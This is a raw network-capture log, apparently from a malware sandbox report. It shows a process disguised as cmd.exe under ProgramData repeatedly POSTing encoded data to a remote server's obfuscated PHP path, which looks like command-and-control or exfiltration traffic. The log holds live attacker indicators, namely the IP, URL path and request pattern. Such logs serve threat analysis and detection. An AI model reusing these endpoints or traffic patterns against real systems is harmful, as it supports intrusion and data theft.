Jan 3, 2025 20:48:07.653898001 CET	2552	OUT	Data Raw: 5f 5f 5c 53 5c 43 5a 5b 5a 5c 55 51 59 5e 54 51 56 5f 5d 41 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __\S\CZ[Z\UQY^TQV_]APRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+0?_$"%'6',Y?#)'6P%-9) 0.&=\ Q'+'_!%Y)/
Jan 3, 2025 20:48:07.936013937 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:08.064183950 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49828	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:08.197770119 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:08.544461966 CET	2560	OUT	Data Raw: 5a 55 5c 52 59 4a 5f 50 5a 5c 55 51 59 5d 54 54 56 50 5d 49 50 5c 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\RYJ_PZ\UQY]TTVP]IP\Z^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+?39\%7%<>>+Q+5$.:>0,9547#W<='_!%Y)+
Jan 3, 2025 20:48:08.854572058 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:08.989757061 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49836	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:09.312822104 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:09.682272911 CET	2560	OUT	Data Raw: 5f 5f 59 5d 59 43 5a 53 5a 5c 55 51 59 58 54 51 56 50 5d 49 50 52 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __Y]YCZSZ\UQYXTQVP]IPRZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $61"2 [<-($.Q$=**<.Y4$<='_!%Y)?
Jan 3, 2025 20:48:09.987142086 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:10.118899107 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49843	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:10.248255014 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:10.606941938 CET	2560	OUT	Data Raw: 5a 55 5c 53 5c 47 5a 5a 5a 5c 55 51 59 56 54 57 56 5f 5d 42 50 5c 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\S\GZZZ\UQYVTWV_]BP\ZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C++3-&&!Z%<3?((4"&&*U :& ?('_!%Y)
Jan 3, 2025 20:48:10.903012991 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:11.037098885 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49844	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:10.332170963 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1848 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:10.684881926 CET	1848	OUT	Data Raw: 5a 56 5c 5c 59 44 5a 53 5a 5c 55 51 59 5e 54 54 56 59 5d 44 50 55 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\\YDZSZ\UQY^TTVY]DPUZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(V/$=!]%=[%Z<[<-)4)%-:)<:14T<'_!%Y)
Jan 3, 2025 20:48:10.990438938 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49850	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:11.155899048 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:11.513128996 CET	2560	OUT	Data Raw: 5a 55 5c 53 59 43 5f 56 5a 5c 55 51 59 58 54 52 56 50 5d 45 50 56 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\SYC_VZ\UQYXTRVP]EPVZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?3;'.&'7!2<+>(($*U2:)#396:74'<'_!%Y)?
Jan 3, 2025 20:48:11.864078045 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:12.070692062 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49857	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:12.379986048 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:12.758991003 CET	2560	OUT	Data Raw: 5f 56 5c 52 59 42 5f 56 5a 5c 55 51 59 56 54 57 56 5c 5d 45 50 56 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\RYB_VZ\UQYVTWV\]EPVZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?#^&-&%:% >-(<5%>)#3-C5Y '3U+='_!%Y)
Jan 3, 2025 20:48:13.014904976 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:13.145898104 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49863	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:13.266545057 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:13.622466087 CET	2560	OUT	Data Raw: 5f 5e 59 5d 59 44 5f 56 5a 5c 55 51 59 5d 54 53 56 59 5d 49 50 56 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^Y]YD_VZ\UQY]TSVY]IPVZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(#]0!Z2%$]+$+4>U%9W3(95"7?V+='_!%Y)+
Jan 3, 2025 20:48:13.910242081 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:14.043957949 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49870	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:14.172398090 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:14.528800011 CET	2560	OUT	Data Raw: 5a 53 59 59 5c 46 5f 51 5a 5c 55 51 59 58 54 5a 56 50 5d 48 50 5d 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZSYY\F_QZ\UQYXTZVP]HP]ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G( ]3.=27]&/<>-(?B5%!>?.&#,+='_!%Y)?
Jan 3, 2025 20:48:14.838407040 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:14.967736959 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49881	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:16.245429039 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:16.591579914 CET	2560	OUT	Data Raw: 5f 5f 59 5d 59 43 5a 5a 5a 5c 55 51 59 5b 54 50 56 5d 5d 40 50 50 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __Y]YCZZZ\UQY[TPV]]@PPZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F(3$=&451?#+T?%=9T(#/[96"48)='_!%Y)3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49882	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:16.246442080 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1848 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:16.591432095 CET	1848	OUT	Data Raw: 5f 53 5c 5f 59 43 5f 57 5a 5c 55 51 59 5e 54 56 56 5d 5d 44 50 53 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\_YC_WZ\UQY^TVV]]DPSZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C+0'!&%<?-;<&Q1>=#9&)\77+='_!%Y)3
Jan 3, 2025 20:48:16.886778116 CET	405	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 31 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 09 1e 26 5b 24 18 28 14 26 28 28 0b 33 03 2a 14 3c 02 23 08 2c 21 28 5e 35 3a 02 0f 2a 55 3b 02 3d 2c 2c 5a 36 01 0b 08 35 11 22 00 28 3a 23 5b 03 1d 22 1c 35 0c 22 10 32 2a 32 04 2f 30 06 45 32 13 39 12 2a 3e 2e 0a 20 07 26 1f 35 3e 38 53 38 20 25 11 27 05 2f 5f 3f 13 25 01 27 15 21 51 00 10 3a 09 27 33 35 5d 24 2c 21 07 24 2d [TRUNCATED] Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:16 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8&[$(&((3<#,!(^5:U;=,,Z65"(:#["5"22/0E29>. &5>8S8 %'/_?%'!Q:'35]$,!$-:0#5Z!2^",2,Q&T/607=)&"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49888	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:17.017426014 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:17.372464895 CET	2560	OUT	Data Raw: 5f 56 5c 52 59 41 5a 55 5a 5c 55 51 59 5f 54 53 56 58 5d 44 50 5d 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\RYAZUZ\UQY_TSVX]DP]ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+V<0>=]2'>1$X+=+*T&:=#',5: 7?V<'_!%Y)#
Jan 3, 2025 20:48:17.656760931 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:17.785247087 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49893	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:17.904280901 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:18.316514015 CET	2560	OUT	Data Raw: 5f 55 5c 5f 5c 41 5f 56 5a 5c 55 51 59 5d 54 55 56 5e 5d 41 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _U\_\A_VZ\UQY]TUV^]APPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B< <'.)Y162? >-<?$&X)V>00,6= (<='_!%Y)+
Jan 3, 2025 20:48:18.587204933 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:18.720141888 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49900	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:18.843574047 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:19.202919006 CET	2560	OUT	Data Raw: 5f 52 5c 5d 5c 40 5f 55 5a 5c 55 51 59 59 54 57 56 58 5d 48 50 56 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _R\]\@_UZ\UQYYTWVX]HPVZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+##$927%/,\<[?T(B%%-")U<- ?T(-'_!%Y)
Jan 3, 2025 20:48:19.546940088 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:19.681186914 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49906	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:19.814526081 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
